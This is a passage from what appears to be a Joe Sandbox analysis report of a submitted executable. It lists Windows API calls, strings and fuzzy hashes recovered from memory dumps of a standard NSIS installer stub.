                                                                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-730719616
                                                                                                              • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
